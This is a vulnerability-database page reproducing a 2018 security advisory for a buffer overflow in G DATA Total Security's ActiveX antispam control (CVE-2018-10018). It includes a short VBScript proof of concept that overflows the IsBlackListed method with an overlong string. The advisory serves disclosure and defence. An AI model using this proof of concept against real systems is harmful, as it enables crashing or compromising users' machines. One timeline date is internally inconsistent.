Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormFelipe Xavier OliveiraPACKETSTORM:148543
HistoryJul 13, 2018 - 12:00 a.m.

G DATA TOTAL SECURITY 25.4.0.3 Active-X Buffer Overflow

2018-07-1300:00:00
Felipe Xavier Oliveira
packetstormsecurity.com
38

0.011 Low

EPSS

Percentile

84.4%

JSON
`=====[ Tempest Security Intelligence - ADV-24/2018 ]===  
  
G DATA TOTAL SECURITY v25.4.0.3 Activex Buffer Overflow  
Author: Filipe Xavier Oliveira  
Tempest Security Intelligence - Recife, Pernambuco - Brazil  
  
=====[ Table of Contents  
]=====================================================  
  
* Overview  
* Detailed description  
* Timeline of disclosure  
* Thanks & Acknowledgements  
* References  
  
=====[ Overview  
]==============================================================  
  
* System affected : G DATA TOTAL SECURITY [1].  
* Software Version : 25.4.0.3 (other versions may also be affected).  
* Impact : A user may be affected by opening a malicious black list  
email in the antispam filter,  
  
=====[ Detailed description  
]==================================================  
The GDASPAMLib.AntiSpam ActiveX control ASK\GDASpam.dll in G DATA Total  
Security 25.4.0.3 has a buffer overflow via a long IsBlackListed argument.  
Through a long input in a member of class called Antispam, isblackedlist  
class is vulnerable a buffer overflow.  
  
A poc that causes a buffer overflow :  
  
<?XML version='1.0' standalone='yes' ?>  
<package><job id='DoneInVBS' debug='false' error='true'>  
<object classid='clsid:B9D1548D-4339-485A-ABA2-F9F9C1CBF8AC' id='target' />  
<script language='vbscript'>  
  
  
'for debugging/custom prolog  
targetFile = "C:\Program Files\G DATA\TotalSecurity\ASK\GDASpam.dll"  
prototype = "Function IsBlackListed ( ByVal strIP As String ) As Long"  
memberName = "IsBlackListed"  
progid = "GDASPAMLib.AntiSpam"  
argCount = 1  
  
arg1=String(14356, "A")  
  
target.IsBlackListed arg1  
  
</script></job></package>  
  
=====[ Timeline of disclosure  
]===============================================  
  
04/10/2018 - Vulnerability reported.  
04/17/2018 - The vendor will fix the vulnerability.  
05/24/2017 - Vulnerability fixed.  
  
07/12/2018 - CVE assigned [1]  
  
=====[ Thanks & Acknowledgements  
]============================================  
  
- Tempest Security Intelligence / Tempest's Pentest Team [3]  
  
=====[ References  
]===========================================================  
  
[1] https://www.gdatasoftware.com/  
  
[2] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10018  
  
[3] http://www.tempest.com.br <http://www.tempest.com.br/>  
  
=====[ EOF  
]====================================================================  
  
--   
Filipe Oliveira  
Tempest Security Intelligence  
  
  
  
`

Related

exploitpack 1
cvelist 1
nvd 1
zdt 2
cve 1
prion 1
exploitdb 1
exploitpack
exploitpack
G DATA Total Security 25.4.0.3 - Activex Buffer Overflow
2018-07-13 00:00:00
cvelist
cvelist
CVE-2018-10018
2018-07-13 17:00:00
nvd
nvd
CVE-2018-10018
2018-07-13 17:29:00
zdt
zdt
G DATA Total Security 25.4.0.3 - Activex Buffer Overflow Exploit
2018-07-13 00:00:00
ISS For Business 14.0.1400.2029 Blue Screen Of Death Vulnerability
2018-07-13 00:00:00
cve
cve
CVE-2018-10018
2018-07-13 17:29:00
prion
prion
Buffer overflow
2018-07-13 17:29:00
exploitdb
exploitdb
G DATA Total Security 25.4.0.3 - Activex Buffer Overflow
2018-07-13 00:00:00

0.011 Low

EPSS

Percentile

84.4%

JSON
Related for PACKETSTORM:148543
exploitpack1cvelist1nvd1zdt2cve1prion1exploitdb1